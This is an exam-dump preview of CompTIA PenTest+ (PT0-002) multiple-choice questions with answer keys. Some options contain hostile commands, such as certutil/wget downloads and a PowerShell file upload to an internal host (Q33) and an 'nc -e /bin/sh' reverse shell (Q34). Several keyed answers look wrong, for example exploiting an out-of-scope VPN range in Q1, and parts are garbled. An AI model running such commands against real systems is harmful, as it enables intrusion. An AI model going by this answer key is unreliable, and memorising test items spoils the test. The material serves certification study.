CompTIA PT0-002 Exam Questions from Itfreedumps

Text Material Preview

Itfreedumps provides the latest online questions for all IT certifications,
such as IBM, Microsoft, CompTIA, Huawei, and so on. 
Hot exams are available below. 
AZ-204 Developing Solutions for Microsoft Azure 
820-605 Cisco Customer Success Manager 
MS-203 Microsoft 365 Messaging 
HPE2-T37 Using HPE OneView 
300-415 Implementing Cisco SD-WAN Solutions (ENSDWI) 
DP-203 Data Engineering on Microsoft Azure 
500-220 Engineering Cisco Meraki Solutions v1.0 
NACE-CIP1-001 Coating Inspector Level 1 
NACE-CIP2-001 Coating Inspector Level 2 
200-301 Implementing and Administering Cisco Solutions 
Share some PT0-002 exam online questions below. 
1.A penetration tester has gained access to a network device that has a previously unknown IP range
on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?
A. Utilize the tunnel as a means of pivoting to other internal devices.
B. Disregard the IP range, as it is out of scope.
 1 / 13
https://www.itfreedumps.com/exam/real-microsoft-az-204-dumps/
https://www.itfreedumps.com/exam/real-cisco-820-605-dumps/
https://www.itfreedumps.com/exam/real-microsoft-ms-203-dumps/
https://www.itfreedumps.com/exam/real-hp-hpe2-t37-dumps/
https://www.itfreedumps.com/exam/real-cisco-300-415-dumps/
https://www.itfreedumps.com/exam/real-microsoft-dp-203-dumps/
https://www.itfreedumps.com/exam/real-cisco-500-220-dumps/
https://www.itfreedumps.com/exam/real-nace-nace-cip1-001-dumps/
https://www.itfreedumps.com/exam/real-nace-nace-cip2-001-dumps/
https://www.itfreedumps.com/exam/real-cisco-200-301-dumps/
C. Stop the assessment and inform the emergency contact.
D. Scan the IP range for additional systems to exploit.
Answer: D
2.Deconfliction is necessary when the penetration test:
A. determines that proprietary information is being stored in cleartext.
B. occurs during the monthly vulnerability scanning.
C. uncovers indicators of prior compromise over the course of the assessment.
D. proceeds in parallel with a criminal digital forensic investigation.
Answer: C
Explanation:
This will then enable the PenTest to continue so that additional issues can be found, exploited, and
analyzed.
3.A client would like to have a penetration test performed that leverages a continuously updated TTPs
framework and covers a wide variety of enterprise systems and networks.
Which of the following methodologies should be used to BEST meet the client's expectations?
A. OWASP Top 10
B. MITRE ATT&CK framework
C. NIST Cybersecurity Framework
D. The Diamond Model of Intrusion Analysis
Answer: B
4.A penetration tester discovered that a client uses cloud mail as the company's email system. During
the penetration test, the tester set up a fake cloud mail login page and sent all company employees
an email that stated their inboxes were full and directed them to the fake login page to remedy the
issue.
Which of the following BEST describes this attack?
A. Credential harvesting
B. Privilege escalation
C. Password spraying
D. Domain record abuse
Answer: A
5.A company hired a penetration-testing team to review the cyber-physical systems in a
manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both
connected to the company intranet.
Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be
valid?
A. PLCs will not act upon commands injected over the network.
B. Supervisors and controllers are on a separate virtual network by default.
C. Controllers will not validate the origin of commands.
D. Supervisory systems will detect a malicious injection of code/commands.
Answer: C
6.A penetration tester runs the following command on a system:
find / -user root Cperm -4000 Cprint 2>/dev/null
 2 / 13
Which of the following is the tester trying to accomplish?
A. Set the SGID on all files in the / directory
B. Find the /root directory on the system
C. Find files with the SUID bit set
D. Find files that were created during exploitation and move them to /dev/null
Answer: C
Explanation:
the 2>/dev/null is output redirection, it simply sends all the error messages to infinity and beyond
preventing any error messages to appear in the terminal session.
7.Which of the following tools should a penetration tester use to crawl a website and build a wordlist
using the data recovered to crack the password on the website?
A. DirBuster
B. CeWL
C. w3af
D. Patator
Answer: B
Explanation:
CeWL, the Custom Word List Generator, is a Ruby application that allows you to spider a website
based on a URL and depth setting and then generate a wordlist from the files and web pages it finds.
Running CeWL against a target organization’s sites can help generate a custom word list, but you
will typically want to add words manually based on your own OSINT gathering efforts.
https://esgeeks.com/como-utilizar-cewl/
8.A penetration tester conducts an Nmap scan against a target and receives the following results:
Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the
target?
A. Nessus
B. ProxyChains
C. OWASPZAP
D. Empire
Answer: B
Explanation:
Reference: https://www.codeproject.com/Tips/634228/How-to-Use-Proxychains-Forwarding-Ports
9.A customer adds a requirement to the scope of a penetration test that states activities can only
occur during normal business hours.
Which of the following BEST describes why this would be necessary?
A. To meet PCI DSS testing requirements
B. For testing of the customer's SLA with the ISP
C. Because of concerns regarding bandwidth limitations
D. To ensure someone is available if something goes wrong
Answer: D
 3 / 13
10.Which of the following expressions in Python increase a variable val by one (Choose two.)
A. val++
B. +val
C. val=(val+1)
D. ++val
E. val=val++
F. val+=1
Answer: C,F
Explanation:
https://pythonguides.com/increment-and-decrement-operators-in-python/
11.A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities
in network switches. However, the script is not working properly.
Which of the following changes should the tester apply to make the script work as intended?
A. Change line 2 to $ip= 10.192.168.254;
B. Remove lines 3, 5, and 6.
C. Remove line 6.
D. Move all the lines below line 7 to the top of the script.
Answer: B
Explanation:
https://www.asc.ohio-state.edu/lewis.239/Class/Perl/perl.html
Example script:
#!/usr/bin/perl
$ip=$argv[1];
attack($ip);
sub attack {
print("x");
}
12.Which of the following would assist a penetration tester the MOST when evaluating the
susceptibility of top-level executives to social engineering attacks?
A. Scraping social media for personal details
B. Registering domain names that are similar to the target company's
C. Identifying technical contacts at the company
D. Crawling the company's website for company information
Answer: A
13.A security firm has been hired to perform an external penetration test against a company. The only
information the firm received was the company name.
Which of the following passive reconnaissance approaches would be MOST likely to yield positive
initial results?
A. Specially craft and deploy phishing emails to key company leaders.
B. Run a vulnerability scan against the company's external website.
C. Runtime the company's vendor/supply chain.
D. Scrape web presences and social-networking sites.
Answer: D
 4 / 13
14.A consulting company is completing the ROE during scoping.
Which of the following should be included in the ROE?
A. Cost ofthe assessment
B. Report distribution
C. Testing restrictions
D. Liability
Answer: B
15.Which of the following is the MOST effective person to validate results from a penetration test?
A. Third party
B. Team leader
C. Chief Information Officer
D. Client
Answer: B
16.A penetration tester conducteda vulnerability scan against a client’s critical servers and found the
following:
Which of the following would be a recommendation for remediation?
A. Deploy a user training program
B. Implement a patch management plan
C. Utilize the secure software development life cycle
D. Configure access controls on each of the servers
Answer: B
17.A penetration-testing team is conducting a physical penetration test to gain entry to a building.
Which of the following is the reason why the penetration testers should carry copies of the
engagement documents with them?
A. As backup in case the original documents are lost
B. To guide them through the building entrances
C. To validate the billing information with the client
D. As proof in case they are discovered
Answer: D
Explanation:
Reference: https://hub.packtpub.com/penetration-testing-rules-of-engagement/
18.Which of the following documents is agreed upon by all parties associated with the penetration-
testing engagement and defines the scope, contacts, costs, duration, and deliverables?
A. SOW
B. SLA
C. MSA
 5 / 13
D. NDA
Answer: A
19.Which of the following concepts defines the specific set of steps and approaches that are
conducted during a penetration test?
A. Scope details
B. Findings
C. Methodology
D. Statement of work
Answer: C
20.A penetration tester wants to scan a target network without being detected by the client’s IDS.
Which of the following scans is MOST likely to avoid detection?
A. nmap Cp0 CT0 CsS 192.168.1.10
B. nmap CsA CsV --host-timeout 60 192.168.1.10
C. nmap Cf --badsum 192.168.1.10
D. nmap CA Cn 192.168.1.10
Answer: A
Explanation:
Reference: https://www.oreilly.com/library/view/network-security-
assessment/9780596510305/ch04.html
21.A company that requires minimal disruption to its daily activities needs a penetration tester to
perform information gathering around the company’s web presence.
Which of the following would the tester find MOST helpful in the initial information-gathering steps?
(Choose two.)
A. IP addresses and subdomains
B. Zone transfers
C. DNS forward and reverse lookups
D. Internet search engines
E. Externally facing open ports
F. Shodan results
Answer: D,F
22.A penetration tester completed an assessment, removed all artifacts and accounts created during
the test, and presented the findings to the client.
Which of the following happens NEXT?
A. The penetration tester conducts a retest.
B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.
Answer: C
23.A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant.
Which of the following is the MINIMUM frequency to complete the scan of the system?
A. Weekly
B. Monthly
 6 / 13
C. Quarterly
D. Annually
Answer: C
Explanation:
https://www.pcicomplianceguide.org/faq/#25
PCI DSS requires quarterly vulnerability/penetration tests, not weekly.
24.A penetration tester has been given eight business hours to gain access to a client’s financial
system.
Which of the following techniques will have the highest likelihood of success?
A. Attempting to tailgate an employee going into the client's workplace
B. Dropping a malicious USB key with the company’s logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management
Answer: D
25.A company uses a cloud provider with shared network bandwidth to host a web application on
dedicated servers. The company's contact with the cloud provider prevents any activities that would
interfere with the cloud provider's other customers.
When engaging with a penetration-testing company to test the application, which of the following
should the company avoid?
A. Crawling the web application's URLs looking for vulnerabilities
B. Fingerprinting all the IP addresses of the application's servers
C. Brute forcing the application's passwords
D. Sending many web requests per second to test DDoS protection
Answer: D
26.Which of the following is a rules engine for managing public cloud accounts and resources?
A. Cloud Custodian
B. Cloud Brute
C. Pacu
D. Scout Suite
Answer: A
Explanation:
Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users
to define policies to enable a well managed cloud infrastructure, that's both secure and cost
optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible
tool, with unified metrics and reporting.
27.A penetration tester ran a ping CA command during an unknown environment test, and it returned
a 128 TTL packet.
Which of the following OSs would MOST likely return a packet of this type?
A. Windows
B. Apple
C. Linux
D. Android
Answer: A
Explanation:
 7 / 13
Reference: https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-with-ping/
28.A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false
positives and increases the true positives of the results.
Which of the following would MOST likely accomplish this goal?
A. Using OpenVAS in default mode
B. Using Nessus with credentials
C. Using Nmap as the root user
D. Using OWASP ZAP
Answer: B
Explanation:
Using credentials during a vulnerability scan allows the scanner to gather more detailed information
about the target system, including installed software, patch levels, and configuration settings. This
helps to reduce the likelihood of false positives and increase the true positives of the results. Nessus
is a popular vulnerability scanner that supports credential-based scanning and can be used to
accomplish this goal. OpenVAS
and Nmap are also popular scanning tools, but using default mode or running as the root user alone
may not provide the necessary level of detail for accurate vulnerability identification. OWASP ZAP is a
web application scanner and may not be applicable for non-web-based targets.
29.After gaining access to a previous system, a penetration tester runs an Nmap scan against a
network with the following results:
The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?
A. The tester input the incorrect IP address.
B. The command requires the -port 135 option.
C. An account for RDP does not exist on the server.
D. PowerShell requires administrative privilege.
Answer: C
30.A penetration tester was able to compromise a server and escalate privileges.
Which of the following should the tester perform AFTER concluding the activities on the specified
target? (Choose two.)
A. Remove the logs from the server.
 8 / 13
B. Restore the server backup.
C. Disable the running services.
D. Remove any tools or scripts that were installed.
E. Delete any created credentials.
F. Reboot the target server.
Answer: D,E
31.A penetration tester wants to find hidden information in documents available on the web at a
particular domain.
Which of the following should the penetration tester use?
A. Netcraft
B. CentralOps
C. Responder
D. FOCA
Answer: D
Explanation:
https://kalilinuxtutorials.com/foca-metadata-hidden-documents/
32.A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a
Linux server and discovers the following data in a file named password.txt in the /home/svsacct
directory:
U3VQZXIkM2NyZXQhCg==
Which of the following commands should the tester use NEXT to decode the contents of the file?
A. echo U3VQZXIkM2NyZXQhCg== | base64 "d
B. tar zxvf password.txt
C. hydra "l svsacct "p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24
D. john --wordlist /usr/share/seclists/rockyou.txt password.txt
Answer: A
33.A penetration tester has obtained a low-privilege shell on a Windows server with a defaultconfiguration and now wants to explore the ability to exploit misconfigured service permissions.
Which of the following commands would help the tester START this process?
A. certutil Curlcache Csplit Cf http://192.168.2.124/windows-binaries/ accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’,
‘systeminfo.txt’)
C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe CO accesschk64.exe
Answer: A
Explanation:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-
malware-while-bypassing-av/
--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
34.A penetration tester has obtained root access to a Linux-based file server and would like to
maintain persistence after reboot.
Which of the following techniques would BEST support this objective?
A. Create a one-shot system service to establish a reverse shell.
B. Obtain /etc/shadow and brute force the root password.
 9 / 13
C. Run the nc -e /bin/sh <...> command.
D. Move laterally to create a user account on LDAP
Answer: A
Explanation:
https://hosakacorp.net/p/systemd-user.html
35.During a penetration test, a tester is able to change values in the URL from
example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application.
Which of the following vulnerabilities has the penetration tester exploited?
A. Command injection
B. Broken authentication
C. Direct object reference
D. Cross-site scripting
Answer: C
Explanation:
Insecure direct object reference (IDOR) is a vulnerability where the developer of the application does
not implement authorization features to verify that someone accessing data on the site is allowed to
access that data.
36.A physical penetration tester needs to get inside an organization's office and collect sensitive
information without acting suspiciously or being noticed by the security guards. The tester has
observed that the company's ticket gate does not scan the badges, and employees leave their
badges on the table while going to the restroom.
Which of the following techniques can the tester use to gain physical access to the office? (Choose
two.)
A. Shoulder surfing
B. Call spoofing
C. Badge stealing
D. Tailgating
E. Dumpster diving
F. Email phishing
Answer: C,D
37.A penetration tester is trying to restrict searches on Google to a specific domain.
Which of the following commands should the penetration tester consider?
A. inurl:
B. link:
C. site:
D. intitle:
Answer: C
38.During an engagement, a penetration tester found the following list of strings inside a file:
 10 / 13
Which of the following is the BEST technique to determine the known plaintext of the strings?
A. Dictionary attack
B. Rainbow table attack
C. Brute-force attack
D. Credential-stuffing attack
Answer: B
39.During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the
target company's website and then creates a list of possible usernames based on the email address
format.
Which of the following types of attacks would MOST likely be used to avoid account lockout?
A. Mask
B. Rainbow
C. Dictionary
D. Password spraying
Answer: D
40.During an assessment, a penetration tester was able to access the organization's wireless network
from outside of the building using a laptop running Aircrack-ng.
Which of the following should be recommended to the client to remediate this issue?
A. Changing to Wi-Fi equipment that supports strong encryption
B. Using directional antennae
C. Using WEP encryption
D. Disabling Wi-Fi
Answer: A
 11 / 13
41.A penetration tester is examining a Class C network to identify active systems quickly.
Which of the following commands should the penetration tester use?
A. nmap sn 192.168.0.1/16
B. nmap sn 192.168.0.1-254
C. nmap sn 192.168.0.1 192.168.0.1.254
D. nmap sN 192.168.0.0/24
Answer: B
42.A penetration tester obtained the following results after scanning a web server using the dirb utility:
...
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 C FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration
tester?
A. index.html
B. about
C. info
D. home.html
Answer: B
43. URL redirect - prevent external calls
44.An exploit developer is coding a script that submits a very large number of small requests to a web
server until the server is compromised. The script must examine each response received and
compare the data to a large number of strings to determine which data to submit next.
Which of the following data structures should the exploit developer use to make the string comparison
and determination as efficient as possible?
A. A list
B. A tree
C. A dictionary
D. An array
Answer: C
Explanation:
data structures are used to store data in an organized form, and some data structures are more
efficient and suitable for certain operations than others. For example, hash tables, skip lists and jump
lists are some dictionary data structures that can insert and access elements efficiently3. For string
comparison, there are different algorithms that can measure how similar two strings are, such as
Levenshtein distance, Hamming distance or Jaccard similarity4. Some of these algorithms can be
implemented using data structures such as arrays or hashtables 5.
 12 / 13
Get PT0-002 exam dumps full version.
Powered by TCPDF (www.tcpdf.org)
 13 / 13
https://www.itfreedumps.com/exam/real-comptia-pt0-002-dumps/
http://www.tcpdf.org